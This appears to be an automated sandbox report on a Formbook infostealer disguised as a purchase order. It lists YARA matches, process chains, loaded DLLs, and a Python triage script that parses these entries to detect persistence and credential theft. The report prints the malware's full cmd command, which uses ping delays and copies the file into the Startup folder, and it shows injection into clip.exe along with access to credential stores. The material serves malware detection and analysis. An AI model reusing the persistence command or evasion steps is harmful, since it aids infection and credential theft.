                Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: PO# 81136575.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: sage.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO# 81136575.exe, Hq1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: sage.exe.4.dr, Hq1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@31/9@24/5
                Source: C:\Users\user\Desktop\PO# 81136575.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\clip.exe | Mutant created: Local\SM0:8692:64:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:304:WilStaging_02
                Source: C:\Windows\SysWOW64\clip.exe | Mutant created: Local\SM0:8692:168:WilStaging_02
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | File created: C:\Users\user\AppData\Local\Temp\sages.txt
                Source: PO# 81136575.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO# 81136575.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO# 81136575.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: clip.exe, 00000018.00000002.5960241652.0000000008163000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: clip.exe, 00000018.00000002.5955950229.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: clip.exe, 00000018.00000002.5960241652.00000000081C3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: PO# 81136575.exe | ReversingLabs: Detection: 73%
                Source: unknown | Process created: C:\Users\user\Desktop\PO# 81136575.exe "C:\Users\user\Desktop\PO# 81136575.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Process created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Windows\SysWOW64\clip.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, gpapi.dll, dwrite.dll, windowscodecs.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll
                Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded (in order): ntmarta.dll
                Source: C:\Windows\SysWOW64\PING.EXE | Sections loaded (in order): iphlpapi.dll, winnsi.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, gpapi.dll, dwrite.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, wininet.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, gpapi.dll, dwrite.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Sections loaded (in order): edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, msvcp140_clr0400.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, msvcp140_clr0400.dll
                Source: C:\Windows\SysWOW64\clip.exe | Sections loaded (in order): version.dll, edgegdi.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, msvcp140_clr0400.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll
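Two things in the entries above are worth pulling out of a report like this automatically: the cmd.exe command line at the top of the "Process created" list (two `ping 127.0.0.1 -n 49 > nul` calls used as a sleep, with a `copy` into the Start Menu Startup folder between them), and the module list of clip.exe (wininet.dll next to winsqlite3.dll, vaultcli.dll and dpapi.dll, the DLLs a credential stealer needs and a clipboard utility does not). The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses entries written as "Source: ... | Process created: ..." / "Section loaded: ..." (and the fused form the raw page uses, where the source path runs straight into the action), then applies a few heuristics. The rule names, the 10-second threshold and the lists of injection hosts, console utilities and credential-store DLLs are this example's own assumptions; the sample log is constructed from an abridged subset of the entries above.

```python
"""Triage sandbox behaviour entries such as the 'Process created' and 'Section loaded'
lines in this report. Added example: not part of the Joe Sandbox report or its tooling.
Rule names, thresholds and the host/utility/DLL lists are this example's assumptions."""
import ntpath
import re
from collections import defaultdict

# Constructed sample, abridged from the entries above (not a verbatim copy of the report).
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\PO# 81136575.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
"""

# Non-greedy source group: the fused raw-page form ("...exeProcess created:") parses as
# well as the separated "... | Process created:" form; trailing link residue is dropped.
ENTRY_RE = re.compile(
    r"^Source:\s*(?P<source>.*?)\s*\|?\s*"
    r"(?P<action>Process created|Section loaded|Key opened|Key value queried|File opened):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)
IMAGE_RE = re.compile(r"(.+?\.exe)(?=\s|$)", re.I)  # created-process detail is '<image> <cmdline>'

# Heuristic inputs (assumptions of this example, not facts stated by the report).
INJECTION_HOSTS = {"addinprocess32.exe", "addinprocess.exe"}  # .NET hosts often hollowed by loaders
CONSOLE_UTILS = {"clip.exe", "ping.exe", "findstr.exe", "timeout.exe"}
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}  # expected parents of console utilities
CRED_DLLS = {"vaultcli.dll", "winsqlite3.dll", "dpapi.dll"}  # Credential Manager, browser DBs, DPAPI
STARTUP_DIR = "\\start menu\\programs\\startup\\"
MIN_SLEEP_SECONDS = 10


def parse_entries(text):
    """Return (source, action, detail) for every recognised line in a report dump."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m["source"], m["action"], m["detail"]))
    return entries


def image_of(detail):
    """Image path of a created process, or None for entries such as 'unknown unknown'."""
    m = IMAGE_RE.match(detail)
    return m.group(1) if m else None


def ping_sleep_seconds(cmdline):
    """Seconds a 'ping ... -n N > nul' chain stalls for (0 if absent).
    ping waits about a second between echoes, so -n N sleeps roughly N-1 seconds."""
    total = 0
    for segment in re.split(r"&&|\|\||&", cmdline):
        m = re.search(r"\bping\b.*?-n\s+(\d+).*?>\s*nul\b", segment, re.I)
        if m:
            total += max(int(m.group(1)) - 1, 0)
    return total


def startup_copy_target(cmdline):
    """Destination path if the command copies a file into a Startup folder, else None."""
    m = re.search(r'\bcopy\s+("[^"]*"|\S+)\s+("[^"]*"|\S+)', cmdline, re.I)
    if not m:
        return None
    target = m.group(2).strip('"')
    return target if STARTUP_DIR in target.lower() else None


def triage(text):
    """Apply every heuristic; return (rule, subject, evidence) findings in report order."""
    findings = []
    loaded = defaultdict(set)  # entries carry no PID, so module loads are grouped by image path
    for source, action, detail in parse_entries(text):
        if action == "Section loaded":
            loaded[source].add(detail.lower())
        elif action == "Process created" and (image := image_of(detail)):
            child, parent = ntpath.basename(image).lower(), ntpath.basename(source).lower()
            secs = ping_sleep_seconds(detail)
            if secs >= MIN_SLEEP_SECONDS:
                findings.append(("ping-as-sleep", source, f"{secs}s delay via ping -n"))
            target = startup_copy_target(detail)
            if target:
                findings.append(("startup-persistence", source, target))
            if child in INJECTION_HOSTS and not source.lower().startswith("c:\\windows\\"):
                findings.append(("injection-host-spawn", source, child))
            if child in CONSOLE_UTILS and parent not in SHELL_PARENTS:
                findings.append(("odd-utility-parent", source, child))
    for source, modules in loaded.items():
        hits = sorted(modules & CRED_DLLS)
        if ntpath.basename(source).lower() in CONSOLE_UTILS and len(hits) >= 2:
            findings.append(("credential-dlls-in-utility", source, ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for rule, subject, evidence in triage(SAMPLE_LOG):
        print(f"[{rule}] {subject} -> {evidence}")
```

Run against the sample it reports five findings: the ping chain (96 seconds of delay across the two `-n 49` calls), the copy into the Startup folder, sage.exe launching AddInProcess32.exe from a user-profile path, RAVCpl64.exe spawning clip.exe, and clip.exe loading three credential-store DLLs. Because the report's "Section loaded" entries carry no process ID, the module heuristic groups by image path; on a real endpoint you would key on PID so that two instances of the same image are not merged.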
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO# 81136575.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PO# 81136575.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO# 81136575.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: PO# 81136575.exe | Static file information: File size 1565184 > 1048576
                Source: PO# 81136575.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16d000
                Source: PO# 81136575.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Drawing.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1263148906.0000000070B0B000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000012.00000002.2732638423.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000018.00000002.5958166544.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5958166544.0000000004ECD000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2732328486.0000000004A4F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2735637861.0000000004BF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: clip.pdb source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: clip.pdbGCTL source: AddInProcess32.exe, 00000012.00000002.2731816086.0000000000F48000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara matchFile source: 14.2.sage.exe.407aa5e.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.471a7fe.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.46c15fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.sage.exe.402185e.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.5ac0000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.42d5570.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.455be60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.42d5570.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.455be60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO# 81136575.exe.5ac0000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.5995803549.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.5995803549.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
